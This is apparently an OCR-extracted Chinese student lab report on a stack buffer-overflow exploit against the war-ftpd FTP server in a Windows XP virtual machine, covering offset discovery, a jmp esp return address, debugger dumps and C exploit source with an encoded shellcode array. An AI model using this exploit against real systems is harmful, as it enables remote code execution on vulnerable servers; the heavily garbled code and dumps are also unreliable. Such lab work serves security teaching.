bimkcAAA網(wǎng)絡(luò)攻擊與防范實(shí)驗(yàn)報(bào)告

1、網(wǎng)絡(luò)攻擊與防范實(shí)驗(yàn)報(bào)告姓名：學(xué)號(hào)：所在班級(jí)：實(shí)驗(yàn)名稱：緩沖區(qū)溢出實(shí)驗(yàn) 實(shí)驗(yàn)日期： 2014 年11 月C 日指導(dǎo)老師：張玉清實(shí)驗(yàn)評(píng)分：驗(yàn)收評(píng)語(yǔ)：實(shí)驗(yàn)?zāi)康模?、掌握緩沖區(qū)溢出的原理2、掌握常用的緩沖區(qū)溢出方法3、理解緩沖區(qū)溢出的危害性4、掌握防范和避免緩沖區(qū)溢出攻擊的方法實(shí)驗(yàn)環(huán)境：主機(jī)系統(tǒng)：Windows8 x64位虛擬機(jī)系統(tǒng)：Windows XP(SP3) ( IP :)溢出對(duì)象：war-ftpd調(diào)試工具：CDB(Debugging Tools for Windows);開(kāi)發(fā)環(huán)境：Visual Studio2013開(kāi)發(fā)語(yǔ)言：C語(yǔ)言緩沖區(qū)溢出原理：在 metasploit 中搜索 war-ftp

2、 可以發(fā)現(xiàn)在 windows下有以下漏洞 username overflow , 也就是在用戶使用 user username 這個(gè)指令時(shí)，如果 username過(guò)長(zhǎng) 就會(huì)發(fā)生緩沖區(qū)溢出。計(jì)算機(jī)在調(diào)用函數(shù) function (arg1,argm)時(shí)，函數(shù)棧的布局如圖1所示，首先將函數(shù)的實(shí)參從右往左依次壓棧，即argm,arg1。然后將函數(shù)返回地址 RET壓棧。這時(shí)EBP指向當(dāng)前函數(shù)的基地址，ESP指向棧頂，將此時(shí)的 EBP壓棧，然后ESP的值賦給EBP這樣EBP就指向新的函數(shù)棧的基地址。調(diào)用函數(shù)后，再將局部變量依次壓棧，這時(shí)ESP始終指向棧頂。另外還有一個(gè)EIP寄存器，EIP中存放的是下一個(gè)要

3、執(zhí)行的指令的地址， 程序崩潰時(shí)EIP 的值就是RET通過(guò)構(gòu)造特殊的字符串，即兩兩都不相同的字符串，我們可以根據(jù)EIP的值定位RET的位置。知道了 RET的位置以后，我們只要在RET這個(gè)位置放上我們想要執(zhí)行的跳轉(zhuǎn)指令就可以 實(shí)現(xiàn)跳轉(zhuǎn)。為了方便我們找一個(gè)系統(tǒng)中現(xiàn)成的指令jmp esp來(lái)實(shí)現(xiàn)跳轉(zhuǎn)。jmp esp指令在內(nèi)存中的通用地址是 0 x7ffa4512，可以通過(guò)CDB的U 7ffa4512來(lái)確定該地址中存放的是否為 jmp esp 。jmp esp將EIP指向了 esp指向的位置，我們用定位 RET的辦法同樣定位 ESP指向的位 置，然后用shellcode替換這塊字符串，這樣計(jì)算機(jī)就會(huì)執(zhí)行s

4、hellcode ,從而實(shí)現(xiàn)攻擊。當(dāng)然，我們還可以用其他的指令，如 jmp esi ,同樣得到j(luò)mp esi指令在系統(tǒng)內(nèi)存中的 地址，以及esi指向的內(nèi)存，我們就可以執(zhí)行shellcode 。也可以使用多次跳轉(zhuǎn)。ESP 十局部變量n局部變量2EBP局部變量1EBPRET函數(shù)參數(shù)1函數(shù)參數(shù)2函數(shù)參數(shù)m圖1函數(shù)棧的布局實(shí)驗(yàn)步驟：1、測(cè)試漏洞是否存在1)在虛擬機(jī)上用CDB各掛起使用主機(jī)與虛擬機(jī)上的war-ftpd 建立連接ftp - nA *10000CWiridowssysieti3Zcmd.exe - ftp -nRicrosoft WindDursL版,4, 62y之修(c 2012 Micr

5、o sof t Cuppa rat ion o 保蹈所有權(quán)利0s Miserstp riftp open 1T2.16B.137,128國(guó)到 28,22網(wǎng)- JgaaJs Pan Club FTP Service WfiR-FTPD 1,&5 Readv220 Please ent e v youii user nam .f Lit? user AAAAAAAAAFlflAAAAAAAAAAAAAAAAAAAAAAAAAAAAAftAAAAAAAAAAAAAAAftflAArihftAAAAAAA AAAAAAAAAnAAflAAAAAAAnAAAAAnAAAAAAAA

6、AAAAAAAAAAflAAAAnAAAAAAAAAAnAAAAAnAAAHAAAAAAAn AAAAAAAAAAAAAAAARAAftflAAAAAAAAAAAAFlAAfiAAAAnAAAfiAAAAARAAAAAAAmAAAAAAnAAriftAAAAAAAA AnnnAAAAiAAAflnflAnnAAnflAaAftAnAnAAAAnnnnnnAAniiAflnAaAnAnAAAftAAanAnAnAnnnAAAhAAAnAAflA AAAAAAAAAAAAflAAARAAFlflAAAAftAAAAAAAFlAAAAAAAAAiAnAAAAAftAAAAAtlAftAAnAAARF

7、inAAriftftAAAAAAA AAAAAAAAAAAAflAAAAAAAflAAAAAAAAAAAAAAAAAARARAAAAAAAAAAAAAAAAAAAAAAARftnAAAnAAAAAAAn AAAAAAAAArtRAflAAAAAAAflAAARAAAAAAARAAAAAAAAAAAAAnAriAAAAAflAflAAAAAAnftnnfAAAAAAAAA AnAAAAAAAAAAflAAAAAnflAAAftAAAAAAAAAAaAAAAAnAAflAAAAAftnAfiAftAAAnflnaAAnAnAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAA

8、AAAAAAAAAAAftAAAAAAAAAAAAAAAAftAAtlAftAAhAAAHftAAAAAAAAAAAAA ARAnAnHflRflHAflRnnHRRRRHARnARARRRRRAflRARHARRRAARnHHHnHRnflnflRAflnAAHRRHARARRnnAARnRH AAAAAAAAAAAAflAAAAAAAnAAAftflAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAnAAAAnAAAAAnAAAHAAAAAAAA AAnAAAAAflAAAflnAAAAnflAAflnAAAAAAAAAAAAAAAAaAAnAAAflflftnAfiflAAAA

9、nflnaAAnAAAAflAAAAAAAAA nAAftAAAAAAAnflAhAnAAftflAAAAAAAAAAAAnnAftAnAAAAAAflAAAA331 User nane okay* Need password.雷呼3)溢出成功，CDB甫獲至ij war-ftpd異常，EIP被“AAAA覆蓋。ESP指向的位置也全 是字符A。%工金與提示筒-edb pn war_ftpd. eeLrtdlllt DbsBioalcPo dnt ： ?c?2120ti ccJjiLM ： idldS g99c.9a8)： Access vlolAt ion - code cO0Q的35 (irsc

10、 chance)Fit*總t chirnce exceptions are peuorted hefui*e any exccvtLon hnndlinq.TI11.& except ijon nW be expect ad and .-00H00Uttl cIjk -U0M0600G cc k-00000091. ed-08000000 e s 1 -7ufl0D 32 e cd.x-00aE f c 48eip=4141-00aEfd48 ebp=00aefiopl-Bnv up el pl nz po nclcs=Utiin si =0023 da-6023 es=0023 Fs=O03

11、h gs=00Mef 1=0001 Q21241414141 ?U：nGl dd sap 尚 Mx UnflN NG - UnaJblc tc verify c Jic<&uni for C： M)c c um n t; 3 and Cca M)dmxn xa tvat|ur、桌面3d廣-f lpl_ext:-* EHHOK： Module Laad completed but s：ynh口2 could not Jbe loaded for U： Dacument 卜 and Sett inqsAdriinistiatoiXftpd.exeFSROR ： Mndule load c nm

12、pl eted butsynha Is; enu Id nn t heiDadeil inn C： MJlNDtMJSXsyEten32 odlbc int _d 11Cuiildn r i自 error At JirapJp：Brf?dil esp*BWaefd4M HOefdS8 BQaefd&a H0aefd78QQaefd88H04efda8 udaeFilhR h：aei41414141 414141 41 41414141 4141111 41414141 4141414141414141 414141 4141414141 41414141 4141414141414141 41

13、414141 41414141 4141H1414141414141 41 41 41 41414141 41414141 41414141 41414141 41414141 414141414141 41 4141 41 4141 41 41 4141 41414141 1414141 41414141 41-414141 41414141414141412、定位RET在字符串中的位置以及ESP指向的位置。1) 使用patternCreate 構(gòu)造1000個(gè)不一樣字符構(gòu)成的字符串.品令提示符XpatternCreateXbinper 1.exe pattej*nCreate .pl 1 .

14、txt 100i文件(F)衰后舊格式意看(V)幫助(EAaOAal Aa2 心荻 4 A&5 贏 Aa 私他三9 Ab5 Ab 1 Ab2Ab3Ab 4Ab5Afc 6Ab7AbSAb9AcOAaIc 2Ac3Ac 4Ac SAc6Ac7 Ac 8Ac 9AdeAdi Ad2Ad3Ad4Ad5Ad6Ad7AdSAd 9AeOAelAe2Ae 3Ae 4A e5Ae6ftc7As8Ac9AfOAflAf2Af3AfaAf5AfAf7Af8f9AsOAglA2Ag3Ag5A6A7 AgBAgSAhOhl Ah2Ah3Ah4Ah5Ah5Ah7Ah8Ah9Ai OilAiEAi SAi 4Ai 5Ai

15、 6Ai TAi 8Ai 9Aj OAjlAj 2Aj 3Aj 4Aj 5AJ 6A j TA j 8AjAkOAkLAk2Ak3Ak4Ak5Ak6k TAkSAkQAl OA11A12A 13A14A15Al 6Al 7Al SAI 9Am0AinlAin2Ani3AiD4Ain5Am6AiD7ArTi8AinAn0AnlAn2An3An4An5 An6Ali An0An9Ao OAol AaSAc 3Ajo 4Ao 5Ao6Ao 7 Ad SAo 9ApOAp 1 Ap 2 Ap 3Ap 4 Ap5 Ap GAp 7 Ap 8Ap 9 Aq Ohql Aq2 Aq3 Aq4 Aq 5Kq6

16、Aq 7&qg Aq9 Ar OAr 1 Ar 2 Ar 3 Ar 4 Ar 5 Az6 Ar 7 Ar 8 Ar 9As 0 A slAs2As3As4As5As5As7As8As9At0AtlAt2At3At4At5At6At7At8At9AuOAulAu2Au3 Au4Au5Au6Au7 Au8AuSAyOAv1 Av2Ay3Av4Av5Av6v7 Ay8Av9AwQAw1 Aw2Aw3Aw4Aw5Aw 6Aw7Aw8Aw9AitOAxlAx2Ax3Ax4Ax5Ax6A7Ax8Ax9AyOAylAy2Ay3Ay4Ay5Ay6Av7Ay8A y9Az OAzl Az2Az 3As 4A2

17、5 A z6 Az 7 Az 8 Az 9B aOB al B a20 a3B a4Ba5B a6 BaTBaKB a9Bb OBb 1 Bb2Bb3Bb4B-b5Bb6Bb7BbeBb9BcOBQlBQ2B3Bc4Bc5BceBc7Bftp - n str不同字符的字符串加C:WindowssysteTi32cnd.exe - ftp -nftp? open 192-16K.137.12連接到 28,220-Fan Club PTP Sex-uice MR-FT Pl) 1,5 Read 少220 Plccuic enter tfouir uaer name .ftp? user AaCAa

18、lAa2Aa3Aa4fta5Ha6Aa7Aa8Aa4AheAblAb2Ab3Ah4PllSAJb6flb7AljBAbfAc8AclAc2A E3Ac4Ac&Ac6Ac7AceAc9fld9AdlA(12Ad3Adld&Ad&Ad7Ad8Ad9AeaAelAe2AeAe4Ae5Aetifte7Ae8Ae9 肘Fi肝笄門肝鈉FEAFM”桿R曲軸q附如 他2弧都而加皿。“自h的卜1巾卜2由相由h4AhK bnii7Ah8nh4ni I.1A i2rki3ai4AiniAi7ni.9ni9AjSAjinj2njj4AjEaj&n J?AjSnj9AjenklAk2A k3Ak4flJi5A.6Ali

19、7nkBAli?flldA 11A12A13A11A L5A16 A 17ft 18 A 19AniBAiiilA(ikZAnk3 Am4Hiik5Ain6Aii7Hit8A9 ftnHnnlAn2An3nn4nnLHnbAn?RiiHAn9ADMFlolAo2AD3Ao4AobnobAa7noAoVAp(JAplftp2npJftp4npEnp b Ap?Ap8Av9 AqSAvlAa2Au3Aci4Aq5Acj6A(i7A(j8Aa?Ai0AtlAr2Ar3Ar4Ar5AT&nrb?ArSAi?9AsOAslAs2A sSns4AcGAe tns7nsSAs?nt9AtlAt2At3At4

20、AtGAtSAt9A u0ftuJ.Au.2nu3 Au4nn5niiiiGnu.?niL8Au9A u0ftvlAu2AM3flv4Au5Av6Av?Hv8Aw?Aif0Aidlftij2Au3At)4Au5Aw6AL/?Au6 Aw?Ax0Axiflx2Ax3ftx4Ax5Ax bAxVAxHAxAijUA ulR2fliAAi/7R8Aijf flzHAzlAz2Az3Az4A2SAzfa Az7Aznz9BaUtialBa2B a3Ba4Ba5 Ba6 Ha7 BaB Ba? BbSBblBb2Bb3Bb4BbBBb6B17Blefib9Dc0BcLEc2Ec3Oh4BE5Bc6Bc7

21、Bc8Bc9 Rd0Hdi RdSEda Bd.4Bd&dlGBa7ndeBi2D331 User nane okay* Meed password.留礫421 Passwni*d n arceptefl . Clos ingr enntio 1 eaninecit ion .遠(yuǎn)程主機(jī)關(guān)閉連接。Ftp 4） 程序溢出，EIP=, ESP指向的位置中存放的是出 壽令提示符-cdb -pn rar-ftpa, eze.Occ ： Dre4k Ina true txvn exception code 09600003 irst cJi&nct eax=7ff d?U(W e)x-0B0130091

22、eCK=0M0MB02 edx=HM0U0003 esl-OOtW 13004 edl=U(WMy0S eip=?cy212We esp=ktLUljffee ebp=MlMbFff4 ioiil=Wnv up el pL 2P ha &e nccs=001b ss=0023 ds =802 3 es=002J fs=0a3H s ； Access uiulatiuii - code cQ0O09B5 w-6023 As8023 ca-0023 fa-003b ya-gctl-S0B1022 +0 x32714130； 32714131 1!?7?0：901 ddBBaetd48 PHar?

23、dEREBitc f dGSS0rtCd78 白Uactd88B0aeFd98B0aefda8 PHae r rihR6：Q01esp 71413471 90724129413G7241 73413073 367J413541317441 74413674 32412136714135 41117241 T241JG72 32734131 413V7341 74413274 38744137 41137&4141377141 72413272 38724137 41337341 73413S73 34744133 41397441 754147571413871 347241 mm 41397

24、241 7341347341357441754130755）禾1J用patternOffset 定位RET和ESP指向的位置，RET的相對(duì)位置是 485, ESP的相對(duì)位置是4936）構(gòu)造字符串，編寫攻擊程序。user481 個(gè) NopEBPJmp esp4 個(gè) Nop336字節(jié)的 ShellcodeNopNop.rn04814854894938291000J LI3、測(cè)試攻擊程序，能夠在虛擬機(jī)中彈出計(jì)算器框附：攻擊程序源代碼#include #include #pragma comment lib , ws2_32)int _tmain (int argc , _TCHAR argv 口)c

25、har shellcode口 =xebx03x59xebx05xe8xf8xffxffxf取49x49x49x49x49x49x49x49x49x49x49 x52x32x41x42x41x32x42x41x30 x42x41x58x50 x38x41x42x75x38x69x79x6cxx45x31x68x54x41x68x6fx6cx4bx70 x4fx57x68x6ex6bx71x4fx45x70 x65x51x 5ax4bx67x39x4cx4bx50 x34x4cx4bx77x71x68x6ex75x61x4bx70 x4ex79x6ex4 cx4dx54x4bx70 x72x54x

26、65x57x69x51x49x5ax46x6dx37x71x6fx32x4ax4bx58x74x77x4bx41x44x44x64x35x54x72x55x7ax45x6cx4bx53x6fx51x34x37x7 1x48x6bx51x76x4cx4bx76x6cx50 x4bx6ex6bx71x4fx67x6cx37x71x68x6bx4cx4bx65x4cx4cx4bx64x41x58x6bx4bx39x53x6cx75x74x46x64x78x43x74x7 1x49x50 x30 x64x6ex6bx43x70 x44x70 x4cx45x4fx30 x41x68x44x4cx4ex6

27、bx63x4cx4bx4dx50 x58x30 x37x70 x47x70 x77x70 x6cx4bx65x38x57x4cx31x4fx66 x5ax50 x4ex6ax36x64x63x6fx61x78x6ax38x4bx4ex6cx4ax54x4ex76x37x6bx4取4bx57漢70 x63x51x71x32x4cx52x43x37x70 x42”char jumpesp口 =x12x45xfax7f ;WSADATWSAData;char Buff1000, Recv1024;int nRet;struct sockaddr_in ipAddress;SOCKET;if (WSA

28、Startup( MAKEWORD1), &WSAData) != 0)printf( - WSAStartup failed.n );WSACleanup();exit(1);s = socket( AF_INET SOCK_STREAM;=AF_INET=inet addr();=htons(21);try connect(s, ( struct sockaddr *)&ipAddress, sizeof (ipAddress); catch (.)printf( connection error );memset(Buff, 0 x41, sizeof (Buff) - 1);|memc

29、py(&Buff485, jumpesp, sizeof (jumpesp) - 1);memcpy(&Buff493, shellcode, sizeof (shellcode) - 1);Buff493 + sizeof (shellcode) - 1 =0 ;recv(s, Recv, sizeof (Recv), 0);sprintf( char *)Recv, user %srn, Buff);send(s, ( char *)Recv, strlen( char *)Recv), 0);return 0;實(shí)驗(yàn)體會(huì)：(遇到的問(wèn)題及解決方法、收獲和體會(huì)、提出防范此類緩沖區(qū)溢出漏洞的方法)1、在做這次實(shí)驗(yàn)的時(shí)候幾乎是把能碰到的問(wèn)題都碰到了，因?yàn)橐郧皩?duì)計(jì)算機(jī)內(nèi)存的運(yùn)行狀況不是很了解，可沒(méi)有用過(guò)metas